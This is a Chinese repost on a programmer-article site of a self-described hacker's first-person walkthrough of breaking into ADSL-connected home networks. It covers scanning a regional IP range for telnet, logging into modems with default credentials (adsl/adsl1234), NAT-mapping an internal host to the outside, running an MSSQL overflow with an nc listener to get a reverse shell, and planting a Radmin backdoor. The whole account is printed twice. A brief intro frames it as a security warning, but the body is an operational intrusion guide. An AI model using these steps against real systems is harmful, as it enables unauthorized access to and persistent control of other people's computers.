如何入侵ADSL
程序员文章站
2022-03-29 12:44:17
这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用ADSL已经日益广泛,但我们的安全意识还不是很... 08-10-08...
这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用adsl已经日益广泛,但我们的安全意识还不是很强.听完他的口述希望大家在日后能加强安全防范!
口述:
也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对adsl modem的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透adsl路由入侵内网的方法,在这里和各位一起分享我的心得。
一.扫描
现在很多adsl modem都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:supperscan,填上我所在地区的ip段,(跨多几段都没关系,反正supperscan的速度就是快)眨眼间,结果出来了,开23的主机还真不小啊:)我挑了几台出来,在浏览器那里输入ip:218.xxx.xxx.xxx,ok。登陆对话框出来了,输入user:adsl pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我就是上帝。
二.映射
入侵已经成功了一半,要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,modem的内网ip缺省是192.168.1.1,而大多数就把自己主机的ip设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)。但是192.168.1.2到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下:进入nat选项---添加nat规则---bamid---填入主机ip:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上了,我们访问adsl modem就等于访问主机192.168.1.2了
三.检测
现在我们再请出supperscan对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139 1433等,刚才只是开放了80 23 21 而已(也就是说我们的映射已经成功了)该是x-scan出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低b啊。
四.溢出
既然没有弱口令,也没开80,那只好从溢出方面着手了,但没开80 21 也就webdav .sevr-u的溢出没戏了,很自然,我向导了rpc溢出,但实践证明rpc溢出也是不行的,lsass溢出也不行 。
五.募然回首,那人却在,灯火阑珊处
看来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到1433上了(嘿,不知道他打了sql补丁没有?)心动不如行动,现在只好死马当活马医了,于是
nc -v -l 99
sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一个shell了。
六.设置后门
到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用ftp上传radmin上去的,呵呵,这里不详谈了,相信各位都知道。
口述:
也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对adsl modem的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透adsl路由入侵内网的方法,在这里和各位一起分享我的心得。
一.扫描
现在很多adsl modem都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:supperscan,填上我所在地区的ip段,(跨多几段都没关系,反正supperscan的速度就是快)眨眼间,结果出来了,开23的主机还真不小啊:)我挑了几台出来,在浏览器那里输入ip:218.xxx.xxx.xxx,ok。登陆对话框出来了,输入user:adsl pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我就是上帝。
二.映射
入侵已经成功了一半,要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,modem的内网ip缺省是192.168.1.1,而大多数就把自己主机的ip设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)。但是192.168.1.2到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下:进入nat选项---添加nat规则---bamid---填入主机ip:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上了,我们访问adsl modem就等于访问主机192.168.1.2了
三.检测
现在我们再请出supperscan对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139 1433等,刚才只是开放了80 23 21 而已(也就是说我们的映射已经成功了)该是x-scan出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低b啊。
四.溢出
既然没有弱口令,也没开80,那只好从溢出方面着手了,但没开80 21 也就webdav .sevr-u的溢出没戏了,很自然,我向导了rpc溢出,但实践证明rpc溢出也是不行的,lsass溢出也不行 。
五.募然回首,那人却在,灯火阑珊处
看来这管理员还是比较负责的,该打的补丁都打上了,这时侯,我的目光转移到1433上了(嘿,不知道他打了sql补丁没有?)心动不如行动,现在只好死马当活马医了,于是
nc -v -l 99
sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一个shell了。
六.设置后门
到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用ftp上传radmin上去的,呵呵,这里不详谈了,相信各位都知道。
上一篇: 浩瀚的知识海洋中怎么管理自己的知识